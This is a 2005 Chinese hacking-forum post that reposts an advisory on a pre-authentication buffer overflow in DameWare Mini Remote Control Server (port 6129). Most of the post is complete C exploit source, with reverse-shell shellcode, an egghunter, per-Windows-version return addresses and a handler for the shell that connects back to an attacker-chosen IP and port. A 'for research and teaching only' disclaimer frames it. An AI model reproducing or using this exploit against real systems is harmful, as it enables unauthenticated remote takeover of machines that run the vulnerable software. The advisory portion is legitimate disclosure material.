黑色海岸线论坛 - Powered by Discuz! Board

标题: DameWare Mini Remote Control Server预认证用户名溢出漏洞 [打印本页]

作者: 孤舟独帆 时间: 2005-9-2 08:31 标题: DameWare Mini Remote Control Server预认证用户名溢出漏洞

受影响系统： DameWare Development Mini Remote Control Server 4.8 DameWare Development Mini Remote Control Server 4.2.0.0 DameWare Development Mini Remote Control Server 4.1.0.0 DameWare Development Mini Remote Control Server 4.0 不受影响系统： DameWare Development Mini Remote Control Server 4.9 描述： BUGTRAQ ID: 14707 Mini Remote Control是32位Windows操作系统上的远程控制系统，允许管理员远程控制LAN或WAN中的机器。 DameWare Mini Remote Control Server中存在缓冲区溢出漏洞，成功利用这个漏洞的攻击者可以远程执行任意代码。起因是在检查用户名时不安全的调用了lstrcpyA函数。未经认证的远程攻击者可以通过向DameWare Remote Control Server的默认监听端口6129 TCP发送特制报文来利用这个漏洞。 <*来源：Jackson Pollocks No5 MMiller spoonm Adik （netmaniac@hotmail.KG） *> 测试方法：警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ ude #include #include #pragma comment(lib,"ws2_32") #define ACCEPT_TIMEOUT 25 #define RECVTIMEOUT 15 #define UNKNOWN 0 #define WIN2K 1 #define WINXP 2 #define WIN2K3 3 #define WINNT 4 unsigned char rshell[] = { "\x41\x42\x41\x42\x41\x42\x41\x42\x90\x90\x90\x90\x90\x90\x90\x90"// For The Egghunter "\x90\xFC\x6A\xEB\x52\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B"// Reverse Shell "\x45\x3C\x8B\x7C\x05\x78\x01\xEF\x83\xC7\x01\x8B\x4F\x17\x8B\x5F" "\x1F\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84" "\xC0\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3" "\x8B\x5F\x23\x01\xEB\x66\x8B\x0C\x4B\x8B\x5F\x1B\x01\xEB\x03\x2C" "\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40\x30\x8B\x40\x0C" "\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E\xEC\x50\xFF\xD6" "\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5F\x54\xFF\xD0" "\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66\x81\xED\x08\x02" "\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF\xD6\x53\x53\x53" "\x53\x43\x53\x43\x53\xFF\xD0\x68\x90\x90\x90\x90\x66\x68\x90\x90" "\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF\xD6\x6A\x10\x51" "\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50\x59\x29\xCC\x89" "\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD\xFE\x42\x2D\xFE" "\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3\x16\xFF\x75\x28" "\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51\x55\x51\xFF\xD0" "\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37\xFF\xD0\x68\xE7" "\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF\xD0\x68\xEF\xCE" "\xE0\x60\x53\xFF\xD6\xFF\xD0" }; unsigned char buff[40] = { "\x30\x11\x00\x00\x00\x00\x00\x00\xC3\xF5\x28\x5C\x8F\xC2\x0D\x40"// OS Detection "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00" }; unsigned char fpay[] = { "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"// Egghunter "\xef\xb8\x41\x42\x41\x42\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" }; long ip(char *hostname); void shell (int sock); int check(char *host,unsigned short tport, unsigned int *sp); struct timeval tv; fd_set fds; char buff1[5000]=""; struct spl{ unsigned long eip; char off[20]; }; struct{ char type[10]; struct spl sp[7]; } target_os[]={{ //Could proberly be doing with some better offsets "UNKNOWN" ,{{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{ "WIN 2000" ,{{ 0x750362c3,"ws2_32.dll" },{ 0x75035173,"ws2_32.dll" },{ 0x7C2FA0F7,"ws2_32.dll" },{ 0x7C2FA0F7,"advapi32.dll" },{ 0x7C2FA0F7,"advapi32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{ "WIN XP" ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll" },{ 0x7C941EED,"ws2_32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{ "WIN 2003" ,{{ 0x77E216B8,"advapi32.dll" },{ 0x77FD1F89,"ntdll.dll" },{ 0x77E216B8,"ntdll.dll" },{ 0x77E216B8,"advapi32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},{ "WIN NT4" ,{{ 0x77777777,"unknown.dll" },{ 0x77777776,"unknown.dll" },{ 0x77777775,"unknown.dll" },{ 0x77f326c6,"kernel32.dll" },{ 0x77777773,"unknown.dll" },{ 0x77777772,"unknown.dll" },{ 0x77f32836,"kernel32.dll" }}} }; int main(int argc,char *argv[]) { WSADATA wsaData; struct sockaddr_in targetTCP, localTCP, inAccTCP; int sockTCP,s,localSockTCP,accSockTCP, acsz,switchon; unsigned char packet[24135]=""; unsigned short lport, tport; unsigned long lip, tip; unsigned int ser_p=0; int ver=0; printf("\n\n ====== D4m3w4r3 eXpLo1t, By jpno5 ======\n"); printf(" ====== http://www.jpno5.com ======\n\n"); if(argc < 5){ printf("[+] %s Target_Ip Target_Port Return_Ip Return_Port\n\n",argv[0]);return 1;} WSAStartup(0x0202, &wsaData); tip=ip(argv[1]); tport = atoi(argv[2]); lip=inet_addr(argv[3])^(long)0x00000000; lport=htons(atoi(argv[4]))^(short)0x0000; memcpy(&rshell[184], &lip, 4); memcpy(&rshell[190], &lport, 2); memset(&targetTCP, 0, sizeof(targetTCP));memset(&localTCP, 0, sizeof(localTCP)); targetTCP.sin_family = AF_INET; targetTCP.sin_addr.s_addr = tip; targetTCP.sin_port = htons(tport); localTCP.sin_family = AF_INET; localTCP.sin_addr.s_addr = INADDR_ANY; localTCP.sin_port = htons((unsigned short)atoi(argv[4])); if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("\t\t\t[ FAILED ]\n"); WSACleanup(); return 1; } if ((localSockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("\t\t\t[ FAILED ]\n"); WSACleanup(); return 1; } printf("[#] Listening For Shell On: %s...",argv[4]); if(bind(localSockTCP,(struct sockaddr *)&localTCP,sizeof(localTCP)) !=0){ printf("\t\t\n Binding To Port: %s Failed! Make Sure It Aint In Use\n",argv[4]); WSACleanup(); return 1; } if(listen(localSockTCP,1) != 0){ printf("\t\t\t[ FAILED ]\nFailed to listen on port: %s!\n",argv[4]); WSACleanup(); return 1; } ver = check(argv[1],(unsigned short)atoi(argv[2]),&ser_p); printf("\n

Target: %s SP: %d...",target_os[ver].type,ser_p); memcpy(packet,"\x10\x27",2); memcpy(packet+0xc4+9,rshell,strlen(rshell)); *(unsigned long*)&packet[516] = target_os[ver].sp[ser_p].eip; memcpy(packet+520,fpay,strlen(fpay)); if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){ printf("\n[x] Connection to host failed!\n"); WSACleanup(); exit(1); } switchon=1; ioctlsocket(sockTCP,FIONBIO,&switchon); tv.tv_sec = RECVTIMEOUT; tv.tv_usec = 0;FD_ZERO(&fds); FD_SET(sockTCP,&fds); if((select(1,&fds,0,0,&tv))>0){ recv(sockTCP, buff1, sizeof(buff1),0);}else{ printf("[x] Timeout! Failed to recv packet.\n"); exit(1); } memset(buff1,0,sizeof(buff1)); switchon=0;ioctlsocket(sockTCP,FIONBIO,&switchon); if (send(sockTCP, buff, sizeof(buff),0) == -1){ printf("[x] Failed to inject packet!\n"); WSACleanup(); return 1; } switchon=1; ioctlsocket(sockTCP,FIONBIO,&switchon); tv.tv_sec = RECVTIMEOUT;tv.tv_usec = 0; FD_ZERO(&fds);FD_SET(sockTCP,&fds); if((select(sockTCP+1,&fds,0,0,&tv))>0){ recv(sockTCP, buff1, sizeof(buff1),0);switchon=0; ioctlsocket(sockTCP,FIONBIO,&switchon); if (send(sockTCP, packet, sizeof(packet),0) == -1){ printf("[x] Failed to inject packet! \n"); WSACleanup(); return 1; } }else{ printf("\n[x] Timedout! Failed to receive packet!\n"); WSACleanup(); return 1; } closesocket(sockTCP); printf("\n

Waiting for Shell...\r"); switchon=1; ioctlsocket(localSockTCP,FIONBIO,&switchon); tv.tv_sec = ACCEPT_TIMEOUT; tv.tv_usec = 0;FD_ZERO(&fds); FD_SET(localSockTCP,&fds); if((select(1,&fds,0,0,&tv))>0){ acsz = sizeof(inAccTCP); accSockTCP = accept(localSockTCP,(struct sockaddr *)&inAccTCP, &acsz); printf("\n

Enjoy...\n\n"); shell(accSockTCP); }else{ printf("\n[x] Exploit Failed! Proberly Patched\n"); WSACleanup(); } return 0; } long ip(char *hostname) { struct hostent *he; long ipaddr; if ((ipaddr = inet_addr(hostname)) < 0) { if ((he = gethostbyname(hostname)) == NULL) { printf("[x] Failed to resolve host: %s!\n\n",hostname); WSACleanup();exit(1); } memcpy(&ipaddr, he->h_addr, he->h_length);}return ipaddr;} void shell (int sock){ struct timeval tv;int length; unsigned long o[2]; char buffer[1000]; tv.tv_sec = 1;tv.tv_usec = 0; while (1){ o[0] = 1;o[1] = sock; length = select (0, (fd_set *)&o, NULL, NULL, &tv); if(length == 1){length = recv (sock, buffer, sizeof (buffer), 0); if (length <= 0) { printf ("[x] Connection closed.\n"); WSACleanup(); return; } length = write (1, buffer, length); if (length <= 0) { printf ("[x] Connection closed.\n"); WSACleanup();return;}}else{length = read (0, buffer, sizeof (buffer)); if (length <= 0) { printf ("[x] Connection closed.\n"); WSACleanup();return;}length = send(sock, buffer, length, 0); if (length <= 0) { printf ("[x] Connection closed.\n"); WSACleanup(); return; }}}} int check(char *host,unsigned short tport, unsigned int *sp){ int sockTCP,switchon; struct sockaddr_in targetTCP; struct timeval tv;fd_set fds; memset(&targetTCP,0,sizeof(targetTCP)); targetTCP.sin_family = AF_INET;targetTCP.sin_addr.s_addr = inet_addr(host);targetTCP.sin_port = htons(tport); if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("\t\t\t[ FAILED ]\n Socket not initialized! Exiting...\n"); WSACleanup(); return 1; } if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0){ printf("[x] Connection to host failed!\n"); WSACleanup(); exit(1); } switchon=1; ioctlsocket(sockTCP,FIONBIO,&switchon); tv.tv_sec = RECVTIMEOUT; tv.tv_usec = 0; FD_ZERO(&fds);FD_SET(sockTCP,&fds); if((select(1,&fds,0,0,&tv))>0){ recv(sockTCP, buff1, sizeof(buff1),0);} else{ printf("[x]Timedout! Doesn';t Look Like A Dameware Server\n"); exit(1); } switchon=0; ioctlsocket(sockTCP,FIONBIO,&switchon); if (send(sockTCP, buff, sizeof(buff),0) == -1){ printf("[x] Failed\n"); WSACleanup(); return 1; } switchon=1; ioctlsocket(sockTCP,FIONBIO,&switchon); tv.tv_sec = RECVTIMEOUT; tv.tv_usec = 0;FD_ZERO(&fds); FD_SET(sockTCP,&fds); if((select(sockTCP+1,&fds,0,0,&tv))>0){ recv(sockTCP, buff1, sizeof(buff1),0); closesocket(sockTCP); } else { printf("\n[x] Timedout!\n"); WSACleanup(); return 1; } if(buff1[8]==5 && buff1[12]==0){*sp = atoi(&buff1[37]); closesocket(sockTCP); return WIN2K; } else if(buff1[8]==5 && buff1[12]==1){*sp = atoi(&buff1[37]); closesocket(sockTCP); return WINXP; } else if(buff1[8]==5 && buff1[12]==2){*sp = atoi(&buff1[37]); closesocket(sockTCP); return WIN2K3; } else if(buff1[8]==4){*sp = atoi(&buff1[37]); closesocket(sockTCP); return WINNT; } else{ closesocket(sockTCP); return UNKNOWN; } } 建议：厂商补丁： DameWare Development -------------------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)